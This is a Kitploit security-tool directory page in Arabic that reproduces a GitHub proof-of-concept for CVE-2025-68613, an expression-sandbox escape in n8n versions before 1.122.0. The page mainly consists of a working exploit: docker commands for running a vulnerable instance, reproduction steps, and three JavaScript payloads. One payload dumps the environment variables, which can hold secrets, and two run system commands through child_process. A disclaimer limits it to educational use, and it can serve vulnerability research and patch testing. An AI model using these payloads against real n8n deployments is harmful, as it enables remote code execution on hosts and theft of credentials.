Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/reem-012/poc_cve-2025-68613
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubreem-012/poc_cve-2025-68613

poc_CVE-2025-68613

POC لـ CVE-2025-68613

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PoC: تجاوز بيئة العزل في n8n (CVE-2025-68613)

لأغراض تعليمية فقط يوضح إثبات المفهوم هذا ثغرة حرجة (CVE-2025-68613) في n8n. لا تستخدم هذا على أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها.

نظرة عامة على الثغرة

تحتوي إصدارات n8n السابقة للإصدار 1.122.0 على ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE). يمكن للمستخدمين المصادق عليهم تجاوز بيئة عزل التعبيرات وتنفيذ تعليمات برمجية عشوائية على النظام المضيف عبر حمولات JavaScript محددة في محرر تعبيرات سير العمل.

1. إعداد البيئة القابلة للاستغلال

أنشئ وحدة تخزين بيانات وشغّل نسخة هشّة من n8n (على سبيل المثال، v1.120.0).

root@kitploit:~
# Create volume for persistence
docker volume create n8n_data

# Run vulnerable n8n instance
docker run -it --rm \
  --name n8n \
  -p 5678:5678 \
  -v n8n_data:/home/node/.n8n \
  n8nio/n8n:1.120.0

2. خطوات إعادة الإنتاج

الوصول إلى الواجهة

انتقل إلى http://localhost:5678 وأكمل الإعداد الأولي إذا لزم الأمر.

إنشاء سير عمل

انقر على "Add Workflow" لبدء سير عمل فارغ.

إضافة عقدة قابلة للاستغلال

أضف عقدة Set إلى سير العمل. تسمح لنا هذه العقدة بتحديد قيم يمكن تقييمها كتعبيرات.

تكوين التعبير

في عقدة Set، عدّل معاملًا (مثل value) وغيّر نوع الإدخال إلى Expression.

3. حمولات الاستغلال

أدخل الحمولات التالية في محرر التعبيرات لإثبات الثغرة.

الحمولة 1: تفريغ متغيرات البيئة

تصل هذه الحمولة إلى this.process.env لتسريب متغيرات بيئة حسّاسة من الحاوية.

الحمولة:

root@kitploit:~
{{ (function() {
  return JSON.stringify(this.process.env, null, 2);
})() }}

النتيجة:

الحمولة 2: تنفيذ التعليمات البرمجية عن بُعد (whoami)

تتجاوز هذه الحمولة بيئة العزل عبر الوصول إلى process.mainModule.require لتحميل وحدة child_process، مما يسمح بتنفيذ أوامر نظام عشوائية.

الحمولة:

root@kitploit:~
{{ (function() {
  const require = this.process.mainModule.require;
  const { execSync } = require('child_process');
  return execSync('whoami').toString();
})() }}

النتيجة: يتحقق من سياق المستخدم للعملية الجارية.

الحمولة 3: تنفيذ تعليمات برمجية كامل عن بُعد (سرد الدليل الجذر)

توضح القدرة على تصفح نظام الملفات.

الحمولة:

root@kitploit:~
{{ (function() {
  const require = this.process.mainModule.require;
  const { execSync } = require('child_process');
  return execSync('ls -la /').toString();
})() }}

النتيجة:

تنزيل الأداة